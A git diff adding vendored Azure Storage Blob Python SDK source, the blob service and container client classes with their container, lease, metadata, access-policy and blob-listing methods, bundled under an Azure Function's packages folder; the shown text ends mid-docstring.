+ :rtype: ~azure.storage.blob.ContainerClient + """ + renamed_container = self.get_container_client(new_name) + lease = kwargs.pop('lease', None) + try: + kwargs['source_lease_id'] = lease.id # type: str + except AttributeError: + kwargs['source_lease_id'] = lease + try: + renamed_container._client.container.rename(name, **kwargs) # pylint: disable = protected-access + return renamed_container + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def undelete_container(self, deleted_container_name, deleted_container_version, **kwargs): + # type: (str, str, **Any) -> ContainerClient + """Restores soft-deleted container. + + Operation will only be successful if used within the specified number of days + set in the delete retention policy. + + .. versionadded:: 12.4.0 + This operation was introduced in API version '2019-12-12'. + + :param str deleted_container_name: + Specifies the name of the deleted container to restore. + :param str deleted_container_version: + Specifies the version of the deleted container to restore. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: ~azure.storage.blob.ContainerClient + """ + new_name = kwargs.pop('new_name', None) + if new_name: + warnings.warn("`new_name` is no longer supported.", DeprecationWarning) + container = self.get_container_client(new_name or deleted_container_name) + try: + container._client.container.restore(deleted_container_name=deleted_container_name, # pylint: disable = protected-access + deleted_container_version=deleted_container_version, + timeout=kwargs.pop('timeout', None), **kwargs) + return container + except HttpResponseError as error: + process_storage_error(error) + + def get_container_client(self, container): + # type: (Union[ContainerProperties, str]) -> ContainerClient + """Get a client to interact with the specified container. + + The container need not already exist. + + :param container: + The container. This can either be the name of the container, + or an instance of ContainerProperties. + :type container: str or ~azure.storage.blob.ContainerProperties + :returns: A ContainerClient. + :rtype: ~azure.storage.blob.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START bsc_get_container_client] + :end-before: [END bsc_get_container_client] + :language: python + :dedent: 8 + :caption: Getting the container client to interact with a specific container. + """ + try: + container_name = container.name + except AttributeError: + container_name = container + _pipeline = Pipeline( + transport=TransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return ContainerClient( + self.url, container_name=container_name, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) + + def get_blob_client( + self, container, # type: Union[ContainerProperties, str] + blob, # type: Union[BlobProperties, str] + snapshot=None # type: Optional[Union[Dict[str, Any], str]] + ): + # type: (...) -> BlobClient + """Get a client to interact with the specified blob. + + The blob need not already exist. 
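+
+        For example, a minimal sketch (``service`` and the container and blob
+        names below are assumed placeholders, not part of the SDK samples):
+
+        .. code-block:: python
+
+            blob = service.get_blob_client("reports", "2021/summary.csv")
+            print(blob.url)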
+ + :param container: + The container that the blob is in. This can either be the name of the container, + or an instance of ContainerProperties. + :type container: str or ~azure.storage.blob.ContainerProperties + :param blob: + The blob with which to interact. This can either be the name of the blob, + or an instance of BlobProperties. + :type blob: str or ~azure.storage.blob.BlobProperties + :param snapshot: + The optional blob snapshot on which to operate. This can either be the ID of the snapshot, + or a dictionary output returned by :func:`~azure.storage.blob.BlobClient.create_snapshot()`. + :type snapshot: str or dict(str, Any) + :returns: A BlobClient. + :rtype: ~azure.storage.blob.BlobClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START bsc_get_blob_client] + :end-before: [END bsc_get_blob_client] + :language: python + :dedent: 12 + :caption: Getting the blob client to interact with a specific blob. + """ + try: + container_name = container.name + except AttributeError: + container_name = container + try: + blob_name = blob.name + except AttributeError: + blob_name = blob + _pipeline = Pipeline( + transport=TransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return BlobClient( # type: ignore + self.url, container_name=container_name, blob_name=blob_name, snapshot=snapshot, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_container_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_container_client.py new file mode 100644 index 0000000..2444069 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_container_client.py @@ -0,0 +1,1612 @@ +# pylint: disable=too-many-lines +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
+# -------------------------------------------------------------------------- + +import functools +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, AnyStr, Dict, List, Tuple, IO, Iterator, + TYPE_CHECKING, + TypeVar) + + +try: + from urllib.parse import urlparse, quote, unquote +except ImportError: + from urlparse import urlparse # type: ignore + from urllib2 import quote, unquote # type: ignore + +import six + +from azure.core import MatchConditions +from azure.core.exceptions import HttpResponseError, ResourceNotFoundError +from azure.core.paging import ItemPaged +from azure.core.tracing.decorator import distributed_trace +from azure.core.pipeline import Pipeline +from azure.core.pipeline.transport import HttpRequest + +from ._shared.base_client import StorageAccountHostsMixin, TransportWrapper, parse_connection_str, parse_query +from ._shared.request_handlers import add_metadata_headers, serialize_iso +from ._shared.response_handlers import ( + process_storage_error, + return_response_headers, + return_headers_and_deserialized) +from ._generated import AzureBlobStorage +from ._generated.models import SignedIdentifier +from ._deserialize import deserialize_container_properties +from ._serialize import get_modify_conditions, get_container_cpk_scope_info, get_api_version, get_access_conditions +from ._models import ( # pylint: disable=unused-import + ContainerProperties, + BlobProperties, + BlobType, + FilteredBlob) +from ._list_blobs_helper import BlobPrefix, BlobPropertiesPaged, FilteredBlobPaged +from ._lease import BlobLeaseClient +from ._blob_client import BlobClient + +if TYPE_CHECKING: + from azure.core.pipeline.transport import HttpTransport, HttpResponse # pylint: disable=ungrouped-imports + from azure.core.pipeline.policies import HTTPPolicy # pylint: disable=ungrouped-imports + from datetime import datetime + from ._models import ( # pylint: disable=unused-import + PublicAccess, + AccessPolicy, + ContentSettings, + StandardBlobTier, + PremiumPageBlobTier) + + +def _get_blob_name(blob): + """Return the blob name. + + :param blob: A blob string or BlobProperties + :rtype: str + """ + try: + return blob.get('name') + except AttributeError: + return blob + + +ClassType = TypeVar("ClassType") + + +class ContainerClient(StorageAccountHostsMixin): # pylint: disable=too-many-public-methods + """A client to interact with a specific container, although that container + may not yet exist. + + For operations relating to a specific blob within this container, a blob client can be + retrieved using the :func:`~get_blob_client` function. + + For more optional configuration, please click + `here `_. + + :param str account_url: + The URI to the storage account. In order to create a client given the full URI to the container, + use the :func:`from_container_url` classmethod. + :param container_name: + The name of the container for the blob. + :type container_name: str + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. 
+ :keyword str api_version: + The Storage API version to use for requests. Default value is the most recent service version that is + compatible with the current SDK. Setting to an older version may result in reduced feature compatibility. + + .. versionadded:: 12.2.0 + + :keyword str secondary_hostname: + The hostname of the secondary endpoint. + :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks. + Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_put_size: If the blob size is less than or equal max_single_put_size, then the blob will be + uploaded with only one http PUT request. If the blob size is larger than max_single_put_size, + the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB. + :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory efficient + algorithm when uploading a block blob. Defaults to 4*1024*1024+1. + :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False. + :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call, + the exceeded part will be downloaded in chunks (could be parallel). Defaults to 32*1024*1024, or 32MB. + :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024, + or 4MB. + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START create_container_client_from_service] + :end-before: [END create_container_client_from_service] + :language: python + :dedent: 8 + :caption: Get a ContainerClient from an existing BlobServiceClient. + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START create_container_client_sasurl] + :end-before: [END create_container_client_sasurl] + :language: python + :dedent: 8 + :caption: Creating the container client directly. + """ + def __init__( + self, account_url, # type: str + container_name, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + try: + if not account_url.lower().startswith('http'): + account_url = "https://" + account_url + except AttributeError: + raise ValueError("Container URL must be a string.") + parsed_url = urlparse(account_url.rstrip('/')) + if not container_name: + raise ValueError("Please specify a container name.") + if not parsed_url.netloc: + raise ValueError("Invalid URL: {}".format(account_url)) + + _, sas_token = parse_query(parsed_url.query) + self.container_name = container_name + # This parameter is used for the hierarchy traversal. Give precedence to credential. 
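+        # With no explicit credential, fall back to any SAS token parsed from
+        # the URL query string so that clients derived from this container can
+        # still authenticate.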
+ self._raw_credential = credential if credential else sas_token + self._query_str, credential = self._format_query_string(sas_token, credential) + super(ContainerClient, self).__init__(parsed_url, service='blob', credential=credential, **kwargs) + self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline) + self._client._config.version = get_api_version(kwargs) # pylint: disable=protected-access + + def _format_url(self, hostname): + container_name = self.container_name + if isinstance(container_name, six.text_type): + container_name = container_name.encode('UTF-8') + return "{}://{}/{}{}".format( + self.scheme, + hostname, + quote(container_name), + self._query_str) + + @classmethod + def from_container_url(cls, container_url, credential=None, **kwargs): + # type: (Type[ClassType], str, Optional[Any], Any) -> ClassType + """Create ContainerClient from a container url. + + :param str container_url: + The full endpoint URL to the Container, including SAS token if used. This could be + either the primary endpoint, or the secondary endpoint depending on the current `location_mode`. + :type container_url: str + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token, or the connection string already has shared + access key values. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account shared access + key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :returns: A container client. + :rtype: ~azure.storage.blob.ContainerClient + """ + try: + if not container_url.lower().startswith('http'): + container_url = "https://" + container_url + except AttributeError: + raise ValueError("Container URL must be a string.") + parsed_url = urlparse(container_url.rstrip('/')) + if not parsed_url.netloc: + raise ValueError("Invalid URL: {}".format(container_url)) + + container_path = parsed_url.path.lstrip('/').split('/') + account_path = "" + if len(container_path) > 1: + account_path = "/" + "/".join(container_path[:-1]) + account_url = "{}://{}{}?{}".format( + parsed_url.scheme, + parsed_url.netloc.rstrip('/'), + account_path, + parsed_url.query) + container_name = unquote(container_path[-1]) + if not container_name: + raise ValueError("Invalid URL. Please provide a URL with a valid container name") + return cls(account_url, container_name=container_name, credential=credential, **kwargs) + + @classmethod + def from_connection_string( + cls, # type: Type[ClassType] + conn_str, # type: str + container_name, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): # type: (...) -> ClassType + """Create ContainerClient from a Connection String. + + :param str conn_str: + A connection string to an Azure Storage account. + :param container_name: + The container name for the blob. + :type container_name: str + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token, or the connection string already has shared + access key values. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account shared access + key, or an instance of a TokenCredentials class from azure.identity. 
+            Credentials provided here will take precedence over those in the connection string.
+        :returns: A container client.
+        :rtype: ~azure.storage.blob.ContainerClient
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_authentication.py
+                :start-after: [START auth_from_connection_string_container]
+                :end-before: [END auth_from_connection_string_container]
+                :language: python
+                :dedent: 8
+                :caption: Creating the ContainerClient from a connection string.
+        """
+        account_url, secondary, credential = parse_connection_str(conn_str, credential, 'blob')
+        if 'secondary_hostname' not in kwargs:
+            kwargs['secondary_hostname'] = secondary
+        return cls(
+            account_url, container_name=container_name, credential=credential, **kwargs)
+
+    @distributed_trace
+    def create_container(self, metadata=None, public_access=None, **kwargs):
+        # type: (Optional[Dict[str, str]], Optional[Union[PublicAccess, str]], **Any) -> Dict[str, Union[str, datetime]]
+        """
+        Creates a new container under the specified account. If the container
+        with the same name already exists, the operation fails.
+
+        :param metadata:
+            A dict with name-value pairs to associate with the
+            container as metadata. Example: {'Category': 'test'}
+        :type metadata: dict[str, str]
+        :param ~azure.storage.blob.PublicAccess public_access:
+            Possible values include: 'container', 'blob'.
+        :keyword container_encryption_scope:
+            Specifies the default encryption scope to set on the container and use for
+            all future writes.
+
+            .. versionadded:: 12.2.0
+
+        :paramtype container_encryption_scope: dict or ~azure.storage.blob.ContainerEncryptionScope
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: A dictionary of response headers.
+        :rtype: Dict[str, Union[str, datetime]]
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_containers.py
+                :start-after: [START create_container]
+                :end-before: [END create_container]
+                :language: python
+                :dedent: 12
+                :caption: Creating a container to store blobs.
+        """
+        headers = kwargs.pop('headers', {})
+        timeout = kwargs.pop('timeout', None)
+        headers.update(add_metadata_headers(metadata))  # type: ignore
+        container_cpk_scope_info = get_container_cpk_scope_info(kwargs)
+        try:
+            return self._client.container.create(  # type: ignore
+                timeout=timeout,
+                access=public_access,
+                container_cpk_scope_info=container_cpk_scope_info,
+                cls=return_response_headers,
+                headers=headers,
+                **kwargs)
+        except HttpResponseError as error:
+            process_storage_error(error)
+
+    @distributed_trace
+    def _rename_container(self, new_name, **kwargs):
+        # type: (str, **Any) -> ContainerClient
+        """Renames a container.
+
+        Operation is successful only if the source container exists.
+
+        :param str new_name:
+            The new container name the user wants to rename to.
+        :keyword lease:
+            Specify this to perform the operation only if the lease ID given
+            matches the active lease ID of the source container.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+ :rtype: ~azure.storage.blob.ContainerClient + """ + lease = kwargs.pop('lease', None) + try: + kwargs['source_lease_id'] = lease.id # type: str + except AttributeError: + kwargs['source_lease_id'] = lease + try: + renamed_container = ContainerClient( + "{}://{}".format(self.scheme, self.primary_hostname), container_name=new_name, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=self._pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) + renamed_container._client.container.rename(self.container_name, **kwargs) # pylint: disable = protected-access + return renamed_container + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def delete_container( + self, **kwargs): + # type: (Any) -> None + """ + Marks the specified container for deletion. The container and any blobs + contained within it are later deleted during garbage collection. + + :keyword lease: + If specified, delete_container only succeeds if the + container's lease is active and matches this ID. + Required if the container has an active lease. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START delete_container] + :end-before: [END delete_container] + :language: python + :dedent: 12 + :caption: Delete a container. + """ + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + mod_conditions = get_modify_conditions(kwargs) + timeout = kwargs.pop('timeout', None) + try: + self._client.container.delete( + timeout=timeout, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def acquire_lease( + self, lease_duration=-1, # type: int + lease_id=None, # type: Optional[str] + **kwargs): + # type: (...) -> BlobLeaseClient + """ + Requests a new lease. If the container does not have an active lease, + the Blob service creates a lease on the container and returns a new + lease ID. 
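+
+        A minimal usage sketch (hypothetical ``container_client``; the lease is
+        released explicitly rather than via a context manager)::
+
+            lease = container_client.acquire_lease()
+            try:
+                pass  # work that must hold the container lease
+            finally:
+                lease.release()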
+
+        :param int lease_duration:
+            Specifies the duration of the lease, in seconds, or negative one
+            (-1) for a lease that never expires. A non-infinite lease can be
+            between 15 and 60 seconds. A lease duration cannot be changed
+            using renew or change. Default is -1 (infinite lease).
+        :param str lease_id:
+            Proposed lease ID, in a GUID string format. The Blob service returns
+            400 (Invalid request) if the proposed lease ID is not in the correct format.
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: A BlobLeaseClient object that can be run in a context manager.
+        :rtype: ~azure.storage.blob.BlobLeaseClient
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_containers.py
+                :start-after: [START acquire_lease_on_container]
+                :end-before: [END acquire_lease_on_container]
+                :language: python
+                :dedent: 8
+                :caption: Acquiring a lease on the container.
+        """
+        lease = BlobLeaseClient(self, lease_id=lease_id)  # type: ignore
+        kwargs.setdefault('merge_span', True)
+        timeout = kwargs.pop('timeout', None)
+        lease.acquire(lease_duration=lease_duration, timeout=timeout, **kwargs)
+        return lease
+
+    @distributed_trace
+    def get_account_information(self, **kwargs):
+        # type: (**Any) -> Dict[str, str]
+        """Gets information related to the storage account.
+
+        The information can also be retrieved if the user has a SAS to a container or blob.
+        The keys in the returned dictionary include 'sku_name' and 'account_kind'.
+
+        :returns: A dict of account information (SKU and account type).
+        :rtype: dict(str, str)
+        """
+        try:
+            return self._client.container.get_account_info(cls=return_response_headers, **kwargs)  # type: ignore
+        except HttpResponseError as error:
+            process_storage_error(error)
+
+    @distributed_trace
+    def get_container_properties(self, **kwargs):
+        # type: (Any) -> ContainerProperties
+        """Returns all user-defined metadata and system properties for the specified
+        container. The data returned does not include the container's list of blobs.
+
+        :keyword lease:
+            If specified, get_container_properties only succeeds if the
+            container's lease is active and matches this ID.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :return: Properties for the specified container within a container object.
+        :rtype: ~azure.storage.blob.ContainerProperties
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_containers.py
+                :start-after: [START get_container_properties]
+                :end-before: [END get_container_properties]
+                :language: python
+                :dedent: 12
+                :caption: Getting properties on the container.
+        """
+        lease = kwargs.pop('lease', None)
+        access_conditions = get_access_conditions(lease)
+        timeout = kwargs.pop('timeout', None)
+        try:
+            response = self._client.container.get_properties(
+                timeout=timeout,
+                lease_access_conditions=access_conditions,
+                cls=deserialize_container_properties,
+                **kwargs)
+        except HttpResponseError as error:
+            process_storage_error(error)
+        response.name = self.container_name
+        return response  # type: ignore
+
+    @distributed_trace
+    def exists(self, **kwargs):
+        # type: (**Any) -> bool
+        """
+        Returns True if the container exists, and False otherwise.
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: True if the container exists, False otherwise.
+        :rtype: bool
+        """
+        try:
+            self._client.container.get_properties(**kwargs)
+            return True
+        except HttpResponseError as error:
+            try:
+                process_storage_error(error)
+            except ResourceNotFoundError:
+                return False
+
+    @distributed_trace
+    def set_container_metadata(  # type: ignore
+            self, metadata=None,  # type: Optional[Dict[str, str]]
+            **kwargs
+        ):
+        # type: (...) -> Dict[str, Union[str, datetime]]
+        """Sets one or more user-defined name-value pairs for the specified
+        container. Each call to this operation replaces all existing metadata
+        attached to the container. To remove all metadata from the container,
+        call this operation with no metadata dict.
+
+        :param metadata:
+            A dict containing name-value pairs to associate with the container as
+            metadata. Example: {'category': 'test'}
+        :type metadata: dict[str, str]
+        :keyword lease:
+            If specified, set_container_metadata only succeeds if the
+            container's lease is active and matches this ID.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: Container-updated property dict (Etag and last modified).
+        :rtype: dict[str, str or datetime]
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_containers.py
+                :start-after: [START set_container_metadata]
+                :end-before: [END set_container_metadata]
+                :language: python
+                :dedent: 12
+                :caption: Setting metadata on the container.
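+
+        A minimal inline sketch (assuming an existing ``container_client``)::
+
+            container_client.set_container_metadata({'category': 'test'})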
+ """ + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + mod_conditions = get_modify_conditions(kwargs) + timeout = kwargs.pop('timeout', None) + try: + return self._client.container.set_metadata( # type: ignore + timeout=timeout, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + headers=headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def _get_blob_service_client(self): # pylint: disable=client-method-missing-kwargs + # type: (...) -> BlobServiceClient + """Get a client to interact with the container's parent service account. + + Defaults to current container's credentials. + + :returns: A BlobServiceClient. + :rtype: ~azure.storage.blob.BlobServiceClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START get_blob_service_client_from_container_client] + :end-before: [END get_blob_service_client_from_container_client] + :language: python + :dedent: 8 + :caption: Get blob service client from container object. + """ + from ._blob_service_client import BlobServiceClient + if not isinstance(self._pipeline._transport, TransportWrapper): # pylint: disable = protected-access + _pipeline = Pipeline( + transport=TransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + else: + _pipeline = self._pipeline # pylint: disable = protected-access + return BlobServiceClient( + "{}://{}".format(self.scheme, self.primary_hostname), + credential=self._raw_credential, api_version=self.api_version, _configuration=self._config, + _location_mode=self._location_mode, _hosts=self._hosts, require_encryption=self.require_encryption, + key_encryption_key=self.key_encryption_key, key_resolver_function=self.key_resolver_function, + _pipeline=_pipeline) + + @distributed_trace + def get_container_access_policy(self, **kwargs): + # type: (Any) -> Dict[str, Any] + """Gets the permissions for the specified container. + The permissions indicate whether container data may be accessed publicly. + + :keyword lease: + If specified, get_container_access_policy only succeeds if the + container's lease is active and matches this ID. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Access policy information in a dict. + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START get_container_access_policy] + :end-before: [END get_container_access_policy] + :language: python + :dedent: 12 + :caption: Getting the access policy on the container. 
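+
+        A minimal inline sketch (assuming an existing ``container_client``)::
+
+            policy = container_client.get_container_access_policy()
+            print(policy['public_access'], policy['signed_identifiers'])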
+ """ + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + timeout = kwargs.pop('timeout', None) + try: + response, identifiers = self._client.container.get_access_policy( + timeout=timeout, + lease_access_conditions=access_conditions, + cls=return_headers_and_deserialized, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return { + 'public_access': response.get('blob_public_access'), + 'signed_identifiers': identifiers or [] + } + + @distributed_trace + def set_container_access_policy( + self, signed_identifiers, # type: Dict[str, AccessPolicy] + public_access=None, # type: Optional[Union[str, PublicAccess]] + **kwargs + ): # type: (...) -> Dict[str, Union[str, datetime]] + """Sets the permissions for the specified container or stored access + policies that may be used with Shared Access Signatures. The permissions + indicate whether blobs in a container may be accessed publicly. + + :param signed_identifiers: + A dictionary of access policies to associate with the container. The + dictionary may contain up to 5 elements. An empty dictionary + will clear the access policies set on the service. + :type signed_identifiers: dict[str, ~azure.storage.blob.AccessPolicy] + :param ~azure.storage.blob.PublicAccess public_access: + Possible values include: 'container', 'blob'. + :keyword lease: + Required if the container has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A datetime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified date/time. + :keyword ~datetime.datetime if_unmodified_since: + A datetime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Container-updated property dict (Etag and last modified). + :rtype: dict[str, str or ~datetime.datetime] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START set_container_access_policy] + :end-before: [END set_container_access_policy] + :language: python + :dedent: 12 + :caption: Setting access policy on the container. + """ + if len(signed_identifiers) > 5: + raise ValueError( + 'Too many access policies provided. 
The server does not support setting ' + 'more than 5 access policies on a single resource.') + identifiers = [] + for key, value in signed_identifiers.items(): + if value: + value.start = serialize_iso(value.start) + value.expiry = serialize_iso(value.expiry) + identifiers.append(SignedIdentifier(id=key, access_policy=value)) # type: ignore + signed_identifiers = identifiers # type: ignore + lease = kwargs.pop('lease', None) + mod_conditions = get_modify_conditions(kwargs) + access_conditions = get_access_conditions(lease) + timeout = kwargs.pop('timeout', None) + try: + return self._client.container.set_access_policy( + container_acl=signed_identifiers or None, + timeout=timeout, + access=public_access, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def list_blobs(self, name_starts_with=None, include=None, **kwargs): + # type: (Optional[str], Optional[Union[str, List[str]]], **Any) -> ItemPaged[BlobProperties] + """Returns a generator to list the blobs under the specified container. + The generator will lazily follow the continuation tokens returned by + the service. + + :param str name_starts_with: + Filters the results to return only blobs whose names + begin with the specified prefix. + :param list[str] or str include: + Specifies one or more additional datasets to include in the response. + Options include: 'snapshots', 'metadata', 'uncommittedblobs', 'copy', 'deleted', 'deletedwithversions', + 'tags', 'versions', 'immutabilitypolicy', 'legalhold'. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) response of BlobProperties. + :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.BlobProperties] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START list_blobs_in_container] + :end-before: [END list_blobs_in_container] + :language: python + :dedent: 8 + :caption: List the blobs in the container. + """ + if include and not isinstance(include, list): + include = [include] + + results_per_page = kwargs.pop('results_per_page', None) + timeout = kwargs.pop('timeout', None) + command = functools.partial( + self._client.container.list_blob_flat_segment, + include=include, + timeout=timeout, + **kwargs) + return ItemPaged( + command, prefix=name_starts_with, results_per_page=results_per_page, + page_iterator_class=BlobPropertiesPaged) + + @distributed_trace + def walk_blobs( + self, name_starts_with=None, # type: Optional[str] + include=None, # type: Optional[Any] + delimiter="/", # type: str + **kwargs # type: Optional[Any] + ): + # type: (...) -> ItemPaged[BlobProperties] + """Returns a generator to list the blobs under the specified container. + The generator will lazily follow the continuation tokens returned by + the service. This operation will list blobs in accordance with a hierarchy, + as delimited by the specified delimiter character. + + :param str name_starts_with: + Filters the results to return only blobs whose names + begin with the specified prefix. + :param list[str] include: + Specifies one or more additional datasets to include in the response. + Options include: 'snapshots', 'metadata', 'uncommittedblobs', 'copy', 'deleted'. 
+        :param str delimiter:
+            When the request includes this parameter, the operation returns a BlobPrefix
+            element in the response body that acts as a placeholder for all blobs whose
+            names begin with the same substring up to the appearance of the delimiter
